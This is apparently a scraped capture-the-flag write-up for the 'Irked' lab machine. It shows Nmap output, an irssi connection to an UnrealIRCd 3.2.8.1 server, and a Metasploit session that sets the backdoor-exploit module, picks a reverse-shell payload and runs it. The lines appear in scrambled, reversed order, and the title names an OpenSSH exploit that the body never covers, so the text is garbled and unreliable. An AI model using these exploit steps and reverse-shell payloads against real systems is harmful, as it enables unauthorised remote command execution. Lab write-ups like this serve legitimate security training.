Openssh 6.7p1 exploit
3/22/2023

    LHOST yes The listen address (an interface may be specified)
    msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
    Exploit completed, but no session was created.
    msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
    10.10.10.117:65534 - Exploit failed: An exploitation error occurred.
    RHOSTS 10.10.10.117 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
    msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
    Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
    msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > use 5
    msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
    Compatible Payloads
    0 cmd/unix/bind_perl manual No Unix Command Shell, Bind TCP (via Perl)
    1 cmd/unix/bind_perl_ipv6 manual No Unix Command Shell, Bind TCP (via perl) IPv6
    2 cmd/unix/bind_ruby manual No Unix Command Shell, Bind TCP (via Ruby)
    3 cmd/unix/bind_ruby_ipv6 manual No Unix Command Shell, Bind TCP (via Ruby) IPv6
    4 cmd/unix/generic manual No Unix Command, Generic Command Execution
    5 cmd/unix/reverse manual No Unix Command Shell, Double Reverse TCP (telnet)
    6 cmd/unix/reverse_bash_telnet_ssl manual No Unix Command Shell, Reverse TCP SSL (telnet)
    7 cmd/unix/reverse_perl manual No Unix Command Shell, Reverse TCP (via Perl)
    8 cmd/unix/reverse_perl_ssl manual No Unix Command Shell, Reverse TCP SSL (via perl)
    9 cmd/unix/reverse_ruby manual No Unix Command Shell, Reverse TCP (via Ruby)
    10 cmd/unix/reverse_ruby_ssl manual No Unix Command Shell, Reverse TCP SSL (via Ruby)
    11 cmd/unix/reverse_ssl_double_telnet manual No Unix Command Shell, Double Reverse TCP SSL (telnet)
    msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 65534
    RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
    Name Current Setting Required Description
    msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > options
    Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
    # Name Disclosure Date Rank Check Description
    0 exploit/unix/irc/unreal_ircd_3281_backdoor excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution

UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse) in the DEBUG3_DOLOG_SYSTEM macro, which allows remote attackers to execute arbitrary commands.

    UnrealIRCd 3.x - Remote Denial of Service | windows/dos/
    UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | linux/remote/
    UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | windows/dos/18011.txt
    UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | linux/remote/16922.rb

    MAXTARGETS=20 are supported by this server
    17:18 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet
        CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT are supported by this server
    17:18 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
    17:18 -!- There are 1 users and 0 invisible on 1 servers
    17:18 -!- Mode change for user root

According to this, the server is running UnrealIRCd version 3.2.8.1.

    $ sudo irssi 10.10.10.117 65534
    Irssi v1.2.2-1+b1 -
    17:18 -!- Irssi: The following settings were initialized
    17:18 -!- Irssi: Connecting to 10.10.10.117 port 65534
    17:18 -!- Irssi: Connection to 10.10.10.117 established
    17:18 !irked.htb *** Looking up your hostname.
    17:18 !irked.htb *** Couldn't resolve your hostname using your IP address instead
    17:18 -!- Welcome to the ROXnet IRC Network
    -!- Your host is irked.htb, running version Unreal3.2.8.1
    17:18 -!- This server was created Mon at 13:12:50 EDT
    17:18 -!- irked.htb Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
    17:18 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307

    65534/tcp open irc UnrealIRCd (Admin email

We have an IRC server on this box, so let’s start by trying to connect to it.

    Nmap done: 1 IP address (1 host up) scanned in 65.04 seconds

According to Nmap’s results, these open ports are related to UnrealIRCd:

    |_http-title: Site doesn't have a title (text/html).
    65534/tcp open irc UnrealIRCd (Admin email
    Info: Host: irked.htb OS: Linux CPE: cpe:/o:linux:linux_kernel
    |_http-server-header: Apache/2.4.10 (Debian)